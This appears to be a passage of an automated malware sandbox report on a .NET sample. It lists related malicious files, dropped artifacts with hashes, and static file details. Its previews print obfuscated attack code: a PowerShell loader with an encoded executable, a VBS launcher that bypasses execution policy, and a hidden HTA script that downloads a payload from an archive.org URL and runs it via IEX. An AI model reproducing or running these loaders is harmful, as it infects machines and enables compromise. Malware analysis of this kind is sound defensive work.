                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  2320900000000.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Transfer-Advice000601021_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  WcHO1ZGiIn.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  3c2pU82NQD.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  RFQ-sib.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PackedNET.825.24532.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  090049000009000.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PackedNET.831.4134.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SWIFT COMMERCIAL DUTY 0218J.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  p8Wo6PbOjL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  b7cgnOpObK.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Invoice 8-6-2021.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  090009000000090.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Invoice_OS169ENG 000003893148.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19my_attach_82862.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Check 57549.HtmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Users\Public\-----Run+++++++++.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):780610
                                                                                                                                                                                                                  Entropy (8bit):3.7041478671513444
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:ZWG30D0btNi7GUMC0a4dqWzYnx6fLRNmgvlFw9GMC68jDnyZT1JUOCN3N4mGNY/N:LZtnNqONsZtnNqOg
                                                                                                                                                                                                                  MD5:10305A80924712940646CCA278CEE796
                                                                                                                                                                                                                  SHA1:6DB80D4B3828F14AE105DF2BA8AB3ECCF2AB682F
                                                                                                                                                                                                                  SHA-256:2EC32C9EFDB4BA49EFC12BFDA4EBC8DDE498C618E3746F71BA72DA884F8573C0
                                                                                                                                                                                                                  SHA-512:7EFC040A317BCD3B5F3692F5930ECFEA7CD4C52DD65727ED0C24907D3C01A142FB0F9B805CD21743AB635D1C00E8C4F3DA0D2D8384DCE308C7C296F2A1369C09
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)..{.. $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing".. $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)).. return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG..}....Function HBar {.. .. [CmdletBinding()].. [OutputType([byte[]])].. param(.. [Parameter(Mandatory=$true)] [String]$H3.. ).. $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2).. for ($i = 0; $i -lt $H3.Length; $i += 2) {.. $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16).. }.... return [byte[]]$H2..}..[String]$H4 = '4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24----------
                                                                                                                                                                                                                  C:\Users\Public\Run\Run.vbs
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):433
                                                                                                                                                                                                                  Entropy (8bit):4.896166781572193
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:jaiugaiuTfhUZDiwgARQpSt0rBvxF4mlvIkWFFiw/5JTxz3iuw:jpuwuTSZDirAerxD4iIPFFiYJTcuw
                                                                                                                                                                                                                  MD5:B61084C93B7923021799A1F3D9756182
                                                                                                                                                                                                                  SHA1:9744FD3D75F7F1A6DFB2B3F8C52F21551A96036D
                                                                                                                                                                                                                  SHA-256:70D7CBCE07A5D72764B38923ADE703FAE0BD6FFB2AA435D8A6988E6C66EC89BB
                                                                                                                                                                                                                  SHA-512:ADA6AA5E741F4548050D3CC5D1D700D1B8619F65E44F1D009396E218763F01A255DA170B31E454D44ADF6D7AC714A4477A5A47A7FE27FE8EBD8BA8A0F782EF9D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: Dim FDGFDHGFJGKUGK..Set FDGFDHGFJGKUGK= CreateObject("WScript.Shell")..HVJHGJYGUGKUGU="po"..HHGJUGLHIUGUGKUG="wers"..KUHIHGKYFUYTFUYUYFU="hell -ExecutionPolicy "..DHYJGKUGKUGFUTYTFUY = " Bypass &"..GFDRYTFUGUTUYURFUTR ="'C:\Users\Public"..DTFYHJGJGJYGUTRYTFY = "\-----Run+++++++++.ps1'"..OK = HVJHGJYGUGKUGU+HHGJUGLHIUGUGKUG+KUHIHGKYFUYTFUYUYFU+DHYJGKUGKUGFUTYTFUY++GFDRYTFUGUTUYURFUTR+DTFYHJGJGJYGUTRYTFY+""..FDGFDHGFJGKUGK.Run OK,0
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.log
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\xGrfj8RvYg.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):226
                                                                                                                                                                                                                  Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                  MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                  SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                  SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                  SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt
                                                                                                                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1295
                                                                                                                                                                                                                  Entropy (8bit):5.23215309792381
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:Msp1CIvQmYnlJAGbRUGgSWGQMgnibRFYMbW:np1Cn/A5G5QM3RFPbW
                                                                                                                                                                                                                  MD5:A3B75BE1163014E2F01E87ADC2D49724
                                                                                                                                                                                                                  SHA1:9F8DB267FC3F9263651BDBDABD04FC4B940B0123
                                                                                                                                                                                                                  SHA-256:5A7102CD16FBC915648876A6419231546ADC9E04D50C0F9B71E5D922CA10D9B5
                                                                                                                                                                                                                  SHA-512:2A9CFE2A8B9B90FBC2F866AE294EB422B2926A726CC1674441E216509C07EB07CF65803FE7B59791EB7E393BA278C2E8720D4A00E9E1E64474E32C811D2F869D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt, Author: Arnim Rupp
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  IE Cache URL:https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
                                                                                                                                                                                                                  Preview: <HTML>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<HEAD>..<script language="VBScript">..Window.ReSizeTo 0, 0..Window.moveTo -7000,-7000..Dim FFFFFFFFFFFFFFF..Set FFFFFFFFFFFFFFF= CreateObject("WScript.Shell")..EEEEEEEEEEE="p"..OOOOOOOOOOOOOO = "O"+"We"..ZZZZZZZZZZZZZZZZZ ="RsHe"..BBBBBBBBBBBBBBBBBBBBB = "L"..VVVVVVVVVVVVVVV ="L $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEE
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11883
                                                                                                                                                                                                                  Entropy (8bit):4.890750684634174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:4Vsm5emlQib4NxoeR93YrKkX9smlp5b4Q2Ca6pZlbjvwRjdHPRhjiMDOmEN3H+O8:4kib4WF43opbjvwRjdvRZiQ0HzAFaib9
                                                                                                                                                                                                                  MD5:6049E98CE5D644576C54D3F4844468ED
                                                                                                                                                                                                                  SHA1:58E3D61381D54FD51C0C913940FF9B952189A5D8
                                                                                                                                                                                                                  SHA-256:354ADD5966932A0ED1ABE70FE8A1850B215564290661E34E1FBCEB7989AA5803
                                                                                                                                                                                                                  SHA-512:44878B4BD939DFDB1B34EAEB94280E723FDC3068A1FFC56FA902906669DBDD88F8FEEECC2BE79E838A0841EFBCEE909765F9DE0BAFF01598436C8AC1F6956EAC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: PSMODULECACHE......<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4sskfsz.fda.psm1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vivyprwg.nre.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdrybsou.rmb.psm1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\Documents\20210611\PowerShell_transcript.715575.7kfD7GZs.20210611063402.txt
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2162
                                                                                                                                                                                                                  Entropy (8bit):5.252882108289744
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:BZqvhqZoOG/A5G5QMTbqDYB1Zb/A5G5QMc:BZ2hqZNG/3Q4qDo1Zb/3QD
                                                                                                                                                                                                                  MD5:9B86905AA5C26D14CF48E674C74987F8
                                                                                                                                                                                                                  SHA1:379EFDA2ACCBB4A6CBA9B77A3FACD0D68C4097E1
                                                                                                                                                                                                                  SHA-256:9445D96838C2D5DA7DBD32319509019267D583FBB58F9C45EAF36D893B749DE2
                                                                                                                                                                                                                  SHA-512:4C9E0C3607A22EB5D5F21EEA152213F7A1FAA99B8D0A79900926E0DE41015FDC760714456C565D8B957EFE7AD260C4FEFE54EC42DA0F2CAC0423FE322B9BD039
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210611063402..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFF
                                                                                                                                                                                                                  C:\Users\user\Documents\20210611\PowerShell_transcript.715575.rFlTN3zv.20210611063435.txt
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2547
                                                                                                                                                                                                                  Entropy (8bit):5.443575116223148
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:BZcvhqZoOas8XqDYB1ZhZ3vhqZoOas8XqDYB1ZHpJ1vqAfG7eJ1vqAfG7d:BZMhqZNL6qDo1ZhZfhqZNL6qDo1ZHpTs
                                                                                                                                                                                                                  MD5:2F83B1ABF6F78BEDD9B49AFF43D35A2F
                                                                                                                                                                                                                  SHA1:777ECB2C0A0E855757DC721A3A28C202FDA66767
                                                                                                                                                                                                                  SHA-256:ED881F0E6B02711913C43F0142A80C4822FD54270C0861A4BEDB947A73DCA75B
                                                                                                                                                                                                                  SHA-512:08A14BAF6D1C9521A51E79E96C4D8D4C3AD850895E4DF934B54D3C5EEE8F3534692E25DCF3D0516D80664CA06C32BDB943327A8C7004A660E260CB26C73A3A0D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210611063435..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1..Process ID: 3680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20210611063928..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                  Entropy (8bit):3.5769726079767405
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                  File name:xGrfj8RvYg.exe
                                                                                                                                                                                                                  File size:20480
                                                                                                                                                                                                                  MD5:722603aa75534bec9d1191f062fb2c03
                                                                                                                                                                                                                  SHA1:321ea5aa8368f394dcbdcc6ce7ebaab89861150d
                                                                                                                                                                                                                  SHA256:3e7cecddd88f1fdc8eb055ef6ab1eacfadb706582cb0fe190d99e493baa78691
                                                                                                                                                                                                                  SHA512:04e83e82740789a1d65f26c68076b1ac8b183f378d8f9f58ce8fba55f26276edf4058abdebeabf7b9d37432a64671021a30450e136c736cad57f06a7953e5fb3
